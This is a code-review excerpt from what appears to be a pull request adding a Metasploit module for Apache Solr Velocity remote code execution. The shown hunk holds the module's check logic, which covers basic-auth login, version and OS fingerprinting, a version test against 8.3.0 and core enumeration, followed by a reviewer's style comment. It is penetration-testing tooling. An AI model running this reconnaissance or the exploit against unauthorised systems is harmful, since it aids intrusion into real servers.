modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,407 @@
+                                      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                                    },
+                       'uri'     => '/solr/'
+          })
+
+        # successfully connected?
+        unless attempt_auth
+          return CheckCode::Unknown("Connection failed!")
+        end
+        # if the return code is not 200, then authentication definitely failed
+        unless attempt_auth.code == 200
+          return CheckCode::Unknown('Authentication failed!')
+        end
+
+        print_good("Authentication succeeded!")
+        @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        # TODO: add creds to MSF database
+      end
+    end
+
+    # if successful authentication happens, user the authorization header for the rest of the check
+    if @auth_string == ""
+      @headers = {
+        'Connection'   => 'Keep-Alive',
+      }
+    else
+      @headers = {
+        'Connection'      => 'Keep-Alive',
+        'Authorization'   => @auth_string.to_s
+      }
+    end
+
+    # send a GET request to get Solr and system details
+    ver = send_request_cgi({
+          'method'  => 'GET',
+          'headers' => @headers,
+          'uri'     => '/solr/admin/info/system'
+      })
+
+    # can't connect? that's an automatic failure
+    unless ver
+      return CheckCode::Unknown("Connection failed!")
+    end
+
+    # convert to JSON
+    ver_json = ver.get_json_document
+    # get Solr version
+    @solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
+    print_status("Found Apache Solr #{@solr_version}")
+    # get OS version details
+    @target_platform = ver_json['system']['name']
+    @target_arch = ver_json['system']['arch']
+    @target_osver = ver_json['system']['version']
+    print_status("OS version is #{@target_platform} #{@target_arch} #{@target_osver}")
+    # uname doesn't show up for Windows, so run a check for that.
+    if ver_json['system']['uname']
+      @uname = ver_json['system']['uname'].strip
+      # print uname only when verbose
+      vprint_status("Full uname is '#{@uname}'")
+    end
+
+    # the vulnerability is only present in Solr versions <= 8.3.0
+    unless @solr_version <= Gem::Version.new('8.3.0')
+      return CheckCode::Safe("Running version of Solr is not vulnerable!")
+    end
+
+    # enumerate cores
+    cores = send_request_cgi({
+            'method'  => 'GET',
+            'headers' => @headers,
+            'uri'     => '/solr/admin/cores'
+
+      })
+
+    # can't connect? that's yet another automatic failure
+    unless cores
+      return CheckCode::Unknown("Could not enumerate cores!")
+    end
+
+    # convert to JSON yet again
+    cores_json = cores.get_json_document
+    # draw up an array of all the cores
+    @cores_list = Array.new()
+    # if we are checking, we better have an array of all the exploitable cores
+    @possibly_vulnerable_cores = Array.new()
```

Comment:
This doesn't need to be a class variable.

```suggestion
    possibly_vulnerable_cores = []
```

Reply:
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29